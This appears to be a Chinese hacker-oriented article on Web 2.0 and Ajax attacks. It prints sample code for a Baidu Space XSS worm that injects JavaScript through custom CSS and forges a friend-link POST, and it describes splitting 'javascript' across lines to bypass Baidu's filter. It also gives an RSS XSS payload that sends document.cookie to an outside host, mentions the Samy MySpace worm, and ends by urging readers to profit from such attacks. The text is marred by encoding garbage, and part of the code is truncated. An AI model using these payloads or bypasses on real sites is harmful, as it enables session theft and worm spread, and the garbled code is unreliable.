由此Ajax攻擊可見一斑,然而這還僅僅是個開始��。7月份百度開通了百度空間���,雖然沒有指明是應(yīng)用web2.0技術(shù)���,但從web2.0象征的測試版(beta)和頁面模版架構(gòu)等等,你可以看出它事實上已經(jīng)應(yīng)用了Ajax技術(shù)����。而在空間開通不到半個月,相應(yīng)的攻擊方式又產(chǎn)生了�����,這個攻擊應(yīng)該又算是一個蠕蟲吧���。它利用百度提交的自定義css(Cascading Stylesheet�,層疊樣式表單)中對插入的javascript過濾不嚴(yán)格�,而使攻擊者可以寫入惡意代碼進行了xss(Cross Site Scripting)跨站。從而使瀏覽該空間的百度通行證用戶在不知覺的情況下將該站點加入自己的友情連接中�。最原始代碼標(biāo)本如下:
復(fù)制代碼 代碼如下:
#header{height:89px;background:url("javascript:document.body.onload = function(){ //- - 在css的樣式標(biāo)簽中插入javascript代碼
var req = null;
if(window.XMLHttpRequest) req = new XMLHttpRequest(); //- - 這句懂a(chǎn)jax的都知道,是它的核心XMLHttpRequest���,而下面當(dāng)然是必不可少的判斷是否IE的語句了�。
else if(window.ActiveXObject){
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for(var i=0;i try{req.overrideMimeType('text/xml')}catch(e){}
}
req.open('get','.',false);
req.send();
var s=req.responseText;
p=s.indexOf('passport.baidu.com/?logout');
if(p>0)
{
p=s.indexOf('');
if(p>0)
{
p=s.indexOf('/',p);
p2=s.indexOf(String.fromCharCode(34),p);
var user=s.substring(p+1,p2);
var name='Here is a bad site';
var link='目標(biāo)網(wǎng)址';
var desc='This link was added by an XSS script';
var url='/'+user+'/commit';
var data='ct=6cm=1spRef='+escape('http://hi.baidu.com/#39;+user)+'%2Fmodify%2Fbuddylink%2F0spBuddyName='+escape(name)+'spBuddyURL='+escape(link)+'spBuddyIntro='+escape(desc); //- - 這句是整個蠕蟲的執(zhí)行語句��,也是Ajax的數(shù)據(jù)異步調(diào)用語句�。
req.open('post',url,false);
req.send(data);
alert('A friend link has been added to your space at http://hi.baidu.com/#39; +user);
}
}
else{alert('You are not a logged Baidu user.');} //- - 由于是標(biāo)本語句,所以這里有對是否登陸的判斷�����,但實際攻擊中當(dāng)然不會有�����。
}");
}
當(dāng)時百度在第一時間內(nèi)對此蠕蟲作出了反映——過濾提交表單中的javascript,當(dāng)然這也使正常用戶無法再在blog中貼入Flash動畫��。但后來的變種使得境況變得更糟糕���,因為有人發(fā)現(xiàn)百度僅僅是過濾了CSS文本中的譬如"javascript"和"expression"這樣的字符串���。也就是說如果把”javascript”分成兩行來寫,就可以繞過百度的過濾但同時又被IE執(zhí)行���。而這時變種的蠕蟲也隨之產(chǎn)生�,其造成的結(jié)果是在用戶的css中加入如下代碼:
#header {……
很簡單的一句吧�,這幾乎把該蠕蟲提升到了病毒性質(zhì),因為用戶本身無法到達css修改頁面來修復(fù)他的css代碼����。事實上直到寫這篇文章時,百度空間尚沒有對一些另類的插入惡意代碼方式進行有效地過濾和封鎖�。
如果認為他們所造成的影響都是局域的,那么我不得不帶領(lǐng)大家來看一些影響比較廣泛的最具有web2.0性質(zhì)的——Rss(Really Simple Syndication)攻擊��。這是我從zdnet.com的Joris Evers的一篇名為“Blog feeds may carry security risk ”了解到的�,大體意思是說由于目前幾乎所有的不管是在線的還是離線的Rss閱讀器都沒有有效地對攙雜在Rss中的腳本進行過濾,導(dǎo)致攻擊者可以向Rss中寫入惡意的javascript代碼�,最終導(dǎo)致xss跨站��,獲取用戶信息或其他�����。包括著名的Bloglines, RSS Reader, RSS Owl, Feed Demon, Sharp Reader都在攻擊范圍之內(nèi)。這是去年yahoo rss xss代碼:
javascript:%20document.location='http://www.target.com/cookie.cgi?#39;%20+document cookie;
Should Steal Your Cookie.
Tue, 20 Sep 2005 23:55:18 EDT
javascript:%20alert(document.cookie);
Should Steal Your Cookie.
Tue, 20 Sep 2005 23:55:18 EDT
事實上�����,最早的web2.0攻擊出現(xiàn)在去年的myspace.上���,有人在MySpace交友網(wǎng)站上寫了一段JavaScript蠕蟲代碼���,利用Ajax方法讓無數(shù)的用戶在不知情的情況下把他加入了好友名單,同時在他們的個人簡介最后自動加上了“samy is my hero”的字樣�����。此蠕蟲被稱為世界上第一個“web2.0蠕蟲”��。而從上文的對email�、css、rss攻擊進行的描述中你也可以看出目前對 web2.0的攻擊利用亦是多方面的����。但并不單單指跨站����,網(wǎng)上有一篇《Hacking Ajax》的文章����,其中有一句話被加了黑體,“By corrupting one of the dozens of data exchanges Ajax handles while loading a Web page, a hacker can take over control of the PC”��,也就是說適當(dāng)情況下���,利用Ajax攻擊并獲得個人電腦管理權(quán)限亦是可能的�。
由于目前系統(tǒng)對補丁的發(fā)布采取的都是時時更新功能�����,想通過溢出獲得shell已經(jīng)很難了����,除非是0day的系統(tǒng)漏洞;而sql注入在網(wǎng)絡(luò)也肆虐了幾年���,亦有了行之有效的防范方法�;并且由于Python和Ruby語言的興起,新的web2.0服務(wù)正在產(chǎn)生并有取代現(xiàn)有web結(jié)構(gòu)趨勢��,譬如Plone��。但不可改變的是web瀏覽器對xhtml和javascript的解釋�,只要我們始終有改變javascript的可能性,我們就永遠有提升自己權(quán)限的可能……
那么對于日趨龐大的web2.0大軍����,你是否有興趣從中分一杯羹呢��?
